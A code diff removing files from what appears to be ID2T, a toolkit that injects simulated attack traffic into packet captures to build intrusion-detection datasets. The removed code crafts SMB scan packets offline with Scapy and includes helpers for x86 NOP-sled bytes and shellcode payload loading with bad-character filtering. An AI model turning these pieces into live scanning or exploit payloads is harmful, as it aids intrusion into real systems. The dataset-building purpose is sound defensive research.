-                request = (request_ether / request_ip / request_tcp)
-                request.time = timestamp_next_pkt
-
-                # Append request
-                packets.append(request)
-
-                # Update timestamp for next package
-                timestamp_reply = update_timestamp(timestamp_next_pkt, pps, minDelay)
-                while (timestamp_reply <= timestamp_prv_reply):
-                    timestamp_reply = update_timestamp(timestamp_prv_reply, pps, minDelay)
-                timestamp_prv_reply = timestamp_reply
-
-                if ip in hosting_ip:
-
-                    # 2) Build TCP packages for ip that hosts SMB
-
-                    # destination sends SYN, ACK
-                    reply_ether = Ether(src=mac_destination, dst=mac_source)
-                    reply_ip = IP(src=ip, dst=ip_source, ttl=destination_ttl_value, flags='DF')
-                    reply_tcp = TCP(sport=smb_port, dport=sport, seq=victim_seq, ack=attacker_seq, flags='SA',
-                                    window=destination_win_value, options=[('MSS', destination_mss_value)])
-                    victim_seq += 1
-                    reply = (reply_ether / reply_ip / reply_tcp)
-                    reply.time = timestamp_reply
-                    packets.append(reply)
-
-                    # requester confirms, ACK
-                    confirm_ether = request_ether
-                    confirm_ip = request_ip
-                    confirm_tcp = TCP(sport=sport, dport=smb_port, seq=attacker_seq, ack=victim_seq,
-                                      window=source_win_value, flags='A')
-                    confirm = (confirm_ether / confirm_ip / confirm_tcp)
-                    timestamp_confirm = update_timestamp(timestamp_reply, pps, minDelay)
-                    confirm.time = timestamp_confirm
-                    packets.append(confirm)
-
-                    smb_MID = randint(1, 65535)
-                    smb_PID = randint(1, 65535)
-                    smb_req_tail_arr = []
-                    smb_req_tail_size = 0
-
-                    # select dialects based on smb version
-                    if smb_version is "1":
-                        smb_req_dialects = smb_dialects[0:6]
-                    else:
-                        smb_req_dialects = smb_dialects
-                    if len(smb_req_dialects) == 0:
-                        smb_req_tail_arr.append(SMBNegociate_Protocol_Request_Tail())
-                        smb_req_tail_size = len(SMBNegociate_Protocol_Request_Tail())
-                    else:
-                        for dia in smb_req_dialects:
-                            smb_req_tail_arr.append(SMBNegociate_Protocol_Request_Tail(BufferData = dia))
-                            smb_req_tail_size += len(SMBNegociate_Protocol_Request_Tail(BufferData = dia))
-
-                    smb_req_head = SMBNegociate_Protocol_Request_Header\
-                        (Flags2=0x2801, PID=smb_PID, MID=smb_MID, ByteCount=smb_req_tail_size)
-                    smb_req_length = len(smb_req_head) + smb_req_tail_size
-                    smb_req_net_bio = NBTSession(TYPE=0x00, LENGTH=smb_req_length)
-                    smb_req_tcp = TCP(sport=sport, dport=smb_port, flags='PA', seq=attacker_seq, ack=victim_seq)
-                    smb_req_ip = IP(src=ip_source, dst=ip, ttl=source_ttl_value)
-                    smb_req_ether = Ether(src=mac_source, dst=mac_destination)
-                    attacker_seq += len(smb_req_net_bio) + len(smb_req_head) + smb_req_tail_size
-
-                    smb_req_combined = (smb_req_ether / smb_req_ip / smb_req_tcp / smb_req_net_bio / smb_req_head)
-
-                    for i in range(0 , len(smb_req_tail_arr)):
-                        smb_req_combined = smb_req_combined / smb_req_tail_arr[i]
-
-                    timestamp_smb_req = update_timestamp(timestamp_confirm, pps, minDelay)
-                    smb_req_combined.time = timestamp_smb_req
-                    packets.append(smb_req_combined)
-
-                    # destination confirms SMB request package
-                    reply_tcp = TCP(sport=smb_port, dport=sport, seq=victim_seq, ack=attacker_seq,
-                                    window=destination_win_value, flags='A')
-                    confirm_smb_req = (reply_ether / reply_ip / reply_tcp)
-                    timestamp_reply = update_timestamp(timestamp_smb_req, pps, minDelay)
-                    confirm_smb_req.time = timestamp_reply
-                    packets.append(confirm_smb_req)
-
-                    # smb response package
-                    first_timestamp = time.mktime(time.strptime(self.statistics.get_pcap_timestamp_start()[:19],
-                                                                "%Y-%m-%d %H:%M:%S"))
-                    server_Guid, security_blob, capabilities, data_size, server_start_time = get_smb_platform_data\
-                        (self.host_os, first_timestamp)
-
-                    timestamp_smb_rsp = update_timestamp(timestamp_reply, pps, minDelay)
-                    diff = timestamp_smb_rsp - timestamp_smb_req
-                    begin = get_filetime_format(timestamp_smb_req+diff*0.1)
-                    end = get_filetime_format(timestamp_smb_rsp-diff*0.1)
-                    system_time = randint(begin, end)
-
-                    if smb_version is not "1" and hosting_version is not "1":
-                        smb_rsp_paket = SMB2_SYNC_Header(Flags = 1)
-                        smb_rsp_negotiate_body = SMB2_Negotiate_Protocol_Response\
-                            (DialectRevision=0x02ff, SecurityBufferOffset=124, SecurityBufferLength=len(security_blob),
-                             SecurityBlob=security_blob, Capabilities=capabilities, MaxTransactSize=data_size,
-                             MaxReadSize=data_size, MaxWriteSize=data_size, SystemTime=system_time,
-                             ServerStartTime=server_start_time, ServerGuid=server_Guid)
-                        smb_rsp_length = len(smb_rsp_paket) + len(smb_rsp_negotiate_body)
-                    else:
-                        smb_rsp_paket = SMBNegociate_Protocol_Response_Advanced_Security\
-                            (Start="\xffSMB", PID=smb_PID, MID=smb_MID, DialectIndex=5, SecurityBlob=security_blob)
-                        smb_rsp_length = len(smb_rsp_paket)
-                    smb_rsp_net_bio = NBTSession(TYPE=0x00, LENGTH=smb_rsp_length)
-                    smb_rsp_tcp = TCP(sport=smb_port, dport=sport, flags='PA', seq=victim_seq, ack=attacker_seq)
-                    smb_rsp_ip = IP(src=ip, dst=ip_source, ttl=destination_ttl_value)
-                    smb_rsp_ether = Ether(src=mac_destination, dst=mac_source)
-                    victim_seq += len(smb_rsp_net_bio) + len(smb_rsp_paket)
-                    if smb_version is not "1"and hosting_version is not "1":
-                        victim_seq += len(smb_rsp_negotiate_body)
-
-                    smb_rsp_combined = (smb_rsp_ether / smb_rsp_ip / smb_rsp_tcp / smb_rsp_net_bio / smb_rsp_paket)
-                    if smb_version is not "1"and hosting_version is not "1":
-                        smb_rsp_combined = (smb_rsp_combined / smb_rsp_negotiate_body)
-
-                    smb_rsp_combined.time = timestamp_smb_rsp
-                    packets.append(smb_rsp_combined)
-
-
-                    # source confirms SMB response package
-                    confirm_tcp = TCP(sport=sport, dport=smb_port, seq=attacker_seq, ack=victim_seq,
-                                      window=source_win_value, flags='A')
-                    confirm_smb_res = (confirm_ether / confirm_ip / confirm_tcp)
-                    timestamp_confirm = update_timestamp(timestamp_smb_rsp, pps, minDelay)
-                    confirm_smb_res.time = timestamp_confirm
-                    packets.append(confirm_smb_res)
-
-                    # attacker sends FIN ACK
-                    confirm_tcp = TCP(sport=sport, dport=smb_port, seq=attacker_seq, ack=victim_seq,
-                                      window=source_win_value, flags='FA')
-                    source_fin_ack = (confirm_ether / confirm_ip / confirm_tcp)
-                    timestamp_src_fin_ack = update_timestamp(timestamp_confirm, pps, minDelay)
-                    source_fin_ack.time = timestamp_src_fin_ack
-                    attacker_seq += 1
-                    packets.append(source_fin_ack)
-
-                    # victim sends FIN ACK
-                    reply_tcp = TCP(sport=smb_port, dport=sport, seq=victim_seq, ack=attacker_seq,
-                                    window=destination_win_value, flags='FA')
-                    destination_fin_ack = (reply_ether / reply_ip / reply_tcp)
-                    timestamp_dest_fin_ack = update_timestamp(timestamp_src_fin_ack, pps, minDelay)
-                    victim_seq += 1
-                    destination_fin_ack.time = timestamp_dest_fin_ack
-                    packets.append(destination_fin_ack)
-
-                    # source sends final ACK
-                    confirm_tcp = TCP(sport=sport, dport=smb_port, seq=attacker_seq, ack=victim_seq,
-                                      window=source_win_value, flags='A')
-                    final_ack = (confirm_ether / confirm_ip / confirm_tcp)
-                    timestamp_final_ack = update_timestamp(timestamp_dest_fin_ack, pps, minDelay)
-                    final_ack.time = timestamp_final_ack
-                    packets.append(final_ack)
-
-                else:
-                    # Build RST package
-                    reply_ether = Ether(src=mac_destination, dst=mac_source)
-                    reply_ip = IP(src=ip, dst=ip_source, ttl=destination_ttl_value, flags='DF')
-                    reply_tcp = TCP(sport=smb_port, dport=sport, seq=0, ack=attacker_seq, flags='RA',
-                                    window=destination_win_value, options=[('MSS', destination_mss_value)])
-                    reply = (reply_ether / reply_ip / reply_tcp)
-                    reply.time = timestamp_reply
-                    packets.append(reply)
-
-            pps = max(get_interval_pps(complement_interval_pps, timestamp_next_pkt), 10)
-            timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
-
-        # store end time of attack
-        self.attack_end_utime = packets[-1].time
-
-        # write attack packets to pcap
-        pcap_path = self.write_attack_pcap(sorted(packets, key=lambda pkt: pkt.time))
-
-        # return packets sorted by packet time_sec_start
-        return len(packets), pcap_path

+ 0 - 32
code/ID2TLib/Label.py

@@ -1,32 +0,0 @@
-from functools import total_ordering
-
-
-@total_ordering
-class Label:
-    def __init__(self, attack_name, timestamp_start, timestamp_end, attack_note=""):
-        """
-        Creates a new attack label
-
-        :param attack_name: The name of the associated attack
-        :param timestamp_start: The timestamp as unix time of the first attack packet
-        :param timestamp_end: The timestamp as unix time of the last attack packet
-        :param attack_note: A note associated to the attack (optional)
-        """
-        self.attack_name = attack_name
-        self.timestamp_start = timestamp_start
-        self.timestamp_end = timestamp_end
-        self.attack_note = attack_note
-
-    def __eq__(self, other):
-        return self.timestamp == other.timestamp
-
-    def __lt__(self, other):
-        return self.timestamp_start < other.timestamp_start
-
-    def __gt__(self, other):
-        return self.timestamp_start > other.timestamp_start
-
-    def __str__(self):
-        return ''.join(
-            ['(', self.attack_name, ',', self.attack_note, ',', str(self.timestamp_start), ',', str(self.timestamp_end),
-             ')'])

+ 0 - 45
code/ID2TLib/SMB2.py

@@ -1,45 +0,0 @@
-from scapy.packet import *
-from scapy.fields import *
-from scapy.layers.netbios import NBTSession
-
-
-class SMB2_SYNC_Header(Packet):
-    namez = "SMB2Negociate Protocol Response Header"
-    fields_desc = [StrFixedLenField("Start","\xfeSMB", 4),
-                   LEShortField("StructureSize", 64),
-                   LEShortField("CreditCharge", 0),
-                   LEIntField("Status", 0),
-                   LEShortField("Command", 0),
-                   LEShortField("CreditResponse", 0),
-                   LEIntField("Flags", 0),
-                   LEIntField("NextCommand", 0),
-                   LELongField("MessageID", 0),
-                   LEIntField("Reserved", 0),
-                   LEIntField("TreeID", 0x0),
-                   LELongField("SessionID", 0),
-                   LELongField("Signature1", 0),
-                   LELongField("Signature2", 0)]
-
-
-#No Support of Security Buffer , Padding or Dialect Revision 0x0311
-class SMB2_Negotiate_Protocol_Response(Packet):
-    namez = "SMB2Negociate Protocol Response"
-    fields_desc = [LEShortField("StructureSize", 65),
-                   LEShortField("SecurityMode", 0),
-                   LEShortField("DialectRevision", 0x0),
-                   LEShortField("NegotiateContentCount/Reserved", 0),
-                   StrFixedLenField("ServerGuid", "", 16),
-                   LEIntField("Capabilities", 0),
-                   LEIntField("MaxTransactSize", 0),
-                   LEIntField("MaxReadSize", 0),
-                   LEIntField("MaxWriteSize", 0),
-                   LELongField("SystemTime", 0),
-                   LELongField("ServerStartTime", 0),
-                   LEShortField("SecurityBufferOffset", 0),
-                   LEShortField("SecurityBufferLength", 0),
-                   StrLenField("SecurityBlob", "", length_from=lambda x: x.ByteCount + 16),
-                   LEIntField("NegotiateContextOffset/Reserved2", 0)]
-
-
-bind_layers(NBTSession, SMB2_SYNC_Header,)
-bind_layers(SMB2_SYNC_Header, SMB2_Negotiate_Protocol_Response,)

+ 0 - 108
code/ID2TLib/SMBLib.py

@@ -1,108 +0,0 @@
-from os import urandom
-from binascii import b2a_hex
-from random import random
-
-from ID2TLib.Utility import check_platform, get_filetime_format, get_rnd_boot_time
-
-# SMB port
-smb_port = 445
-
-# SMB versions
-smb_versions = {"1", "2.0", "2.1", "3.0", "3.0.2", "3.1.1"}
-smb_versions_per_win = {'win7': "2.1", 'win10': "3.1.1", 'winxp': "1", 'win8.1': "3.0.2", 'win8': "3.0",
-                        'winvista': "2.0", 'winnt': "1", "win2000": "1"}
-smb_versions_per_samba = {'3.6': "2.0", '4.0': "2.1", '4.1': "3.0", '4.3': "3.1.1"}
-# SMB dialects
-smb_dialects = ["PC NETWORK PROGRAM 1.0", "LANMAN1.0", "Windows for Workgroups 3.1a", "LM1.2X002", "LANMAN2.1",
-                "NT LM 0.12", "SMB 2.002", "SMB 2.???"]
-# SMB security blobs
-security_blob_windows = "\x60\x82\x01\x3c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x82\x01\x30" \
-                        "\x30\x82\x01\x2c\xa0\x1a\x30\x18\x06\x0a\x2b\x06\x01\x04\x01\x82" \
-                        "\x37\x02\x02\x1e\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a" \
-                        "\xa2\x82\x01\x0c\x04\x82\x01\x08\x4e\x45\x47\x4f\x45\x58\x54\x53" \
-                        "\x01\x00\x00\x00\x00\x00\x00\x00\x60\x00\x00\x00\x70\x00\x00\x00" \
-                        "\xbc\x84\x03\x97\x6f\x80\x3b\x81\xa6\x45\x1b\x05\x92\x39\xde\x3d" \
-                        "\xd6\x91\x85\x49\x8a\xd0\x3b\x58\x87\x99\xb4\x98\xdf\xa6\x1d\x73" \
-                        "\x3b\x57\xbf\x05\x63\x5e\x30\xea\xa8\xd8\xd8\x45\xba\x80\x52\xa5" \
-                        "\x00\x00\x00\x00\x00\x00\x00\x00\x60\x00\x00\x00\x01\x00\x00\x00" \
-                        "\x00\x00\x00\x00\x00\x00\x00\x00\x5c\x33\x53\x0d\xea\xf9\x0d\x4d" \
-                        "\xb2\xec\x4a\xe3\x78\x6e\xc3\x08\x4e\x45\x47\x4f\x45\x58\x54\x53" \
-                        "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x98\x00\x00\x00" \
-                        "\xbc\x84\x03\x97\x6f\x80\x3b\x81\xa6\x45\x1b\x05\x92\x39\xde\x3d" \
-                        "\x5c\x33\x53\x0d\xea\xf9\x0d\x4d\xb2\xec\x4a\xe3\x78\x6e\xc3\x08" \
-                        "\x40\x00\x00\x00\x58\x00\x00\x00\x30\x56\xa0\x54\x30\x52\x30\x27" \
-                        "\x80\x25\x30\x23\x31\x21\x30\x1f\x06\x03\x55\x04\x03\x13\x18\x54" \
-                        "\x6f\x6b\x65\x6e\x20\x53\x69\x67\x6e\x69\x6e\x67\x20\x50\x75\x62" \
-                        "\x6c\x69\x63\x20\x4b\x65\x79\x30\x27\x80\x25\x30\x23\x31\x21\x30" \
-                        "\x1f\x06\x03\x55\x04\x03\x13\x18\x54\x6f\x6b\x65\x6e\x20\x53\x69" \
-                        "\x67\x6e\x69\x6e\x67\x20\x50\x75\x62\x6c\x69\x63\x20\x4b\x65\x79"
-security_blob_ubuntu = "\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e" \
-                       "\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa3\x2a" \
-                       "\x30\x28\xa0\x26\x1b\x24\x6e\x6f\x74\x5f\x64\x65\x66\x69\x6e\x65" \
-                       "\x64\x5f\x69\x6e\x5f\x52\x46\x43\x34\x31\x37\x38\x40\x70\x6c\x65" \
-                       "\x61\x73\x65\x5f\x69\x67\x6e\x6f\x72\x65"
-security_blob_macos = "\x60\x7e\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x74\x30\x72\xa0\x44" \
-                      "\x30\x42\x06\x09\x2a\x86\x48\x82\xf7\x12\x01\x02\x02\x06\x09\x2a" \
-                      "\x86\x48\x86\xf7\x12\x01\x02\x02\x06\x06\x2a\x85\x70\x2b\x0e\x03" \
-                      "\x06\x06\x2b\x06\x01\x05\x05\x0e\x06\x0a\x2b\x06\x01\x04\x01\x82" \
-                      "\x37\x02\x02\x0a\x06\x06\x2b\x05\x01\x05\x02\x07\x06\x06\x2b\x06" \
-                      "\x01\x05\x02\x05\xa3\x2a\x30\x28\xa0\x26\x1b\x24\x6e\x6f\x74\x5f" \
-                      "\x64\x65\x66\x69\x6e\x65\x64\x5f\x69\x6e\x5f\x52\x46\x43\x34\x31" \
-                      "\x37\x38\x40\x70\x6c\x65\x61\x73\x65\x5f\x69\x67\x6e\x6f\x72\x65"
-
-
-def get_smb_version(platform: str):
-    """
-    Returns SMB version based on given platform
-
-    :param platform: the platform as string
-    :return: SMB version as string
-    """
-    check_platform(platform)
-    if platform is "linux":
-        return random.choice(list(smb_versions_per_samba.values()))
-    elif platform is "macos":
-        return "2.1"
-    else:
-        return smb_versions_per_win[platform]
-
-
-def get_smb_platform_data(platform: str, timestamp: float):
-    """
-    Gets platform-dependent data for SMB 2 packets
-
-    :param platform: the platform for which to get SMB 2 packet data
-    :param timestamp: a timestamp for calculating the boot-time
-    :return: server_guid, security_blob, capabilities, data_size and server_start_time of the given platform
-    """
-    check_platform(platform)
-    if platform == "linux":
-        server_guid = "ubuntu"
-        security_blob = security_blob_ubuntu
-        capabilities = 0x5
-        data_size = 0x800000
-        server_start_time = 0
-    elif platform == "macos":
-        server_guid = b2a_hex(urandom(15)).decode()
-        security_blob = security_blob_macos
-        capabilities = 0x6
-        data_size = 0x400000
-        server_start_time = 0
-    else:
-        server_guid = b2a_hex(urandom(15)).decode()
-        security_blob = security_blob_windows
-        capabilities = 0x7
-        data_size = 0x100000
-        server_start_time = get_filetime_format(get_rnd_boot_time(timestamp))
-    return server_guid, security_blob, capabilities, data_size, server_start_time
-
-
-def invalid_smb_version(version: str):
-    """
-    Prints an error and exits
-
-    :param version: the invalid SMB
-    """
-    print("\nInvalid smb version: " + version +
-          "\nPlease select one of the following versions: ", smb_versions)
-    exit(1)

+ 0 - 269
code/ID2TLib/Utility.py

@@ -1,269 +0,0 @@
-import ipaddress
-
-from random import randint, uniform
-from os import urandom
-from datetime import datetime
-from calendar import timegm
-from lea import Lea
-
-platforms = {"win7", "win10", "winxp", "win8.1", "macos", "linux", "win8", "winvista", "winnt", "win2000"}
-platform_probability = {"win7": 48.43, "win10": 27.99, "winxp": 6.07, "win8.1": 6.07, "macos": 5.94, "linux": 3.38,
-                        "win8": 1.35, "winvista": 0.46, "winnt": 0.31}
-
-x86_nops = {b'\x90', b'\xfc', b'\xfd', b'\xf8', b'\xf9', b'\xf5', b'\x9b'}
-x86_pseudo_nops = {b'\x97', b'\x96', b'\x95', b'\x93', b'\x92', b'\x91', b'\x99', b'\x4d', b'\x48', b'\x47', b'\x4f',
-                   b'\x40', b'\x41', b'\x37', b'\x3f', b'\x27', b'\x2f', b'\x46', b'\x4e', b'\x98', b'\x9f', b'\x4a',
-                   b'\x44', b'\x42', b'\x43', b'\x49', b'\x4b', b'\x45', b'\x4c', b'\x60', b'\x0e', b'\x1e', b'\x50',
-                   b'\x55', b'\x53', b'\x51', b'\x57', b'\x52', b'\x06', b'\x56', b'\x54', b'\x16', b'\x58', b'\x5d',
-                   b'\x5b', b'\x59', b'\x5f', b'\x5a', b'\x5e', b'\xd6'}
-forbidden_chars = [b'\x00', b'\x0a', b'\x0d']
-
-
-def update_timestamp(timestamp, pps, delay=0):
-    """
-    Calculates the next timestamp to be used based on the packet per second rate (pps) and the maximum delay.
-
-    :return: Timestamp to be used for the next packet.
-    """
-    if delay == 0:
-        # Calculate request timestamp
-        # To imitate the bursty behavior of traffic
-        randomdelay = Lea.fromValFreqsDict({1 / pps: 70, 2 / pps: 20, 5 / pps: 7, 10 / pps: 3})
-        return timestamp + uniform(1 / pps, randomdelay.random())
-    else:
-        # Calculate reply timestamp
-        randomdelay = Lea.fromValFreqsDict({2 * delay: 70, 3 * delay: 20, 5 * delay: 7, 10 * delay: 3})
-        return timestamp + uniform(1 / pps + delay, 1 / pps + randomdelay.random())
-
-
-def get_interval_pps(complement_interval_pps, timestamp):
-    """
-    Gets the packet rate (pps) for a specific time interval.
-
-    :param complement_interval_pps: an array of tuples (the last timestamp in the interval, the packet rate in the
-    corresponding interval).
-    :param timestamp: the timestamp at which the packet rate is required.
-    :return: the corresponding packet rate (pps) .
-    """
-    for row in complement_interval_pps:
-        if timestamp<=row[0]:
-            return row[1]
-    return complement_interval_pps[-1][1] # in case the timstamp > capture max timestamp
-
-
-def get_nth_random_element(*element_list):
-    """
-    Returns the n-th element of every list from an arbitrary number of given lists.
-    For example, list1 contains IP addresses, list 2 contains MAC addresses. Use of this function ensures that
-    the n-th IP address uses always the n-th MAC address.
-    :param element_list: An arbitrary number of lists.
-    :return: A tuple of the n-th element of every list.
-    """
-    range_max = min([len(x) for x in element_list])
-    if range_max > 0: range_max -= 1
-    n = randint(0, range_max)
-    return tuple(x[n] for x in element_list)
-
-
-def index_increment(number: int, max: int):
-            if number + 1 < max:
-                return number + 1
-            else:
-                return 0
-
-
-def get_rnd_os():
-    """
-    Chooses random platform over an operating system probability distribution
-
-    :return: random platform as string
-    """
-    os_dist = Lea.fromValFreqsDict(platform_probability)
-    return os_dist.random()
-
-
-def check_platform(platform: str):
-    """
-    Checks if the given platform is currently supported
-    if not exits with error
-
-    :param platform: the platform, which should be validated
-    """
-    if platform not in platforms:
-        print("\nERROR: Invalid platform: " + platform + "." +
-              "\n Please select one of the following platforms: ", platforms)
-        exit(1)
-
-
-def get_ip_range(start_ip: str, end_ip: str):
-    """
-    Generates a list of IPs of a given range. If the start_ip is greater than the end_ip, the reverse range is generated
-
-    :param start_ip: the start_ip of the desired IP-range
-    :param end_ip:  the end_ip of the desired IP-range
-    :return: a list of all IPs in the desired IP-range, including start-/end_ip
-    """
-    start = ipaddress.ip_address(start_ip)
-    end = ipaddress.ip_address(end_ip)
-    ips = []
-    if start < end:
-        while start <= end:
-            ips.append(start.exploded)
-            start = start+1
-    elif start > end:
-        while start >= end:
-            ips.append(start.exploded)
-            start = start-1
-    else:
-        ips.append(start_ip)
-    return ips
-
-
-def generate_source_port_from_platform(platform: str, previousPort=0):
-    """
-    Generates the next source port according to the TCP-port-selection strategy of the given platform
-
-    :param platform: the platform for which to generate source ports
-    :param previousPort: the previously used/generated source port. Must be 0 if no port was generated before
-    :return: the next source port for the given platform
-    """
-    check_platform(platform)
-    if platform in {"winnt", "winxp", "win2000"}:
-        if (previousPort == 0) or (previousPort + 1 > 5000):
-            return randint(1024, 5000)
-        else:
-            return previousPort + 1
-    elif platform == "linux":
-        return randint(32768, 61000)
-    else:
-        if (previousPort == 0) or (previousPort + 1 > 65535):
-            return randint(49152, 65535)
-        else:
-            return previousPort + 1
-
-
-def get_filetime_format(timestamp):
-    """
-    Converts a timestamp into MS FILETIME format
-
-    :param timestamp: a timestamp in seconds
-    :return: MS FILETIME timestamp
-    """
-    boot_datetime = datetime.fromtimestamp(timestamp)
-    if boot_datetime.tzinfo is None or boot_datetime.tzinfo.utcoffset(boot_datetime) is None:
-        boot_datetime = boot_datetime.replace(tzinfo=boot_datetime.tzname())
-    boot_filetime = 116444736000000000 + (timegm(boot_datetime.timetuple()) * 10000000)
-    return boot_filetime + (boot_datetime.microsecond * 10)
-
-
-def get_rnd_boot_time(timestamp, platform="winxp"):
-    """
-    Generates a random boot time based on a given timestamp and operating system
-
-    :param timestamp: a timestamp in seconds
-    :param platform: a platform as string as specified in check_platform above. default is winxp. this param is optional
-    :return: timestamp of random boot time in seconds since EPOCH
-    """
-    check_platform(platform)
-    if platform is "linux":
-        uptime_in_days = Lea.fromValFreqsDict({3: 50, 7: 25, 14: 12.5, 31: 6.25, 92: 3.125, 183: 1.5625,
-                                               365: 0.78125, 1461: 0.390625, 2922: 0.390625})
-    elif platform is "macos":
-        uptime_in_days = Lea.fromValFreqsDict({7: 50, 14: 25, 31: 12.5, 92: 6.25, 183: 3.125, 365: 3.076171875,
-                                               1461: 0.048828125})
-    else:
-        uptime_in_days = Lea.fromValFreqsDict({3: 50, 7: 25, 14: 12.5, 31: 6.25, 92: 3.125, 183: 1.5625,
-                                               365: 0.78125, 1461: 0.78125})
-    timestamp -= randint(0, uptime_in_days.random()*86400)
-    return timestamp
-
-
-def get_rnd_x86_nop(count=1, side_effect_free=False, char_filter=set()):
-    """
-    Generates a specified number of x86 single-byte (pseudo-)NOPs
-
-    :param count: The number of bytes to generate
-    :param side_effect_free: Determines whether NOPs with side-effects (to registers or the stack) are allowed
-    :param char_filter: A set of bytes which are forbidden to generate
-    :return: Random x86 NOP bytestring
-    """
-    result = b''
-    nops = x86_nops
-    if not side_effect_free:
-        nops |= x86_pseudo_nops
-
-    if not isinstance(char_filter, set):
-        char_filter = set(char_filter)
-    nops = list(nops-char_filter)
-
-    for i in range(0, count):
-        result += nops[randint(0, len(nops) - 1)]
-    return result
-
-
-def get_rnd_bytes(count=1, ignore=None):
-    """
-    Generates a specified number of random bytes while excluding unwanted bytes
-
-    :param count: Number of wanted bytes
-    :param ignore: The bytes, which should be ignored, as an array
-    :return: Random bytestring
-    """
-    if ignore is None:
-        ignore = []
-    result = b''
-    for i in range(0, count):
-        char = urandom(1)
-        while char in ignore:
-            char = urandom(1)
-        result += char
-    return result
-
-
-def get_bytes_from_file(filepath):
-    """
-    Converts the content of a file into its byte representation
-    The content of the file can either be a string or hexadecimal numbers/bytes (e.g. shellcode)
-    The file must have the keyword "str" or "hex" in its first line to specify the rest of the content
-    If the content is hex, whitespaces, backslashes, "x", quotation marks and "+" are removed
-    Example for a hexadecimal input file:
-
-        hex
-        "abcd ef \xff10\ff 'xaa' x \ ab"
-
-    Output: b'\xab\xcd\xef\xff\x10\xff\xaa\xab'
-
-    :param filepath: The path of the file from which to get the bytes
-    :return: The bytes of the file (either a byte representation of a string or the bytes contained in the file)
-    """
-    try:
-        file = open(filepath)
-        result_bytes = b''
-        header = file.readline().strip()
-        content = file.read()
-
-        if header == "hex":
-            content = content.replace(" ", "").replace("\n", "").replace("\\", "").replace("x", "").replace("\"", "")\
-                .replace("'", "").replace("+", "").replace("\r", "")
-            try:
-                result_bytes = bytes.fromhex(content)
-            except ValueError:
-                print("\nERROR: Content of file is not all hexadecimal.")
-                exit(1)
-        elif header == "str":
-            result_bytes = content.encode()
-        else:
-            print("\nERROR: Invalid header found: " + header + ". Try 'hex' or 'str' followed by endline instead.")
-            exit(1)
-
-        for forbidden_char in forbidden_chars:
-            if forbidden_char in result_bytes:
-                print("\nERROR: Forbidden character found in payload: ", forbidden_char)
-                exit(1)
-
-        file.close()
-        return result_bytes
-
-    except FileNotFoundError:
-        print("\nERROR: File not found: ", filepath)
-        exit(1)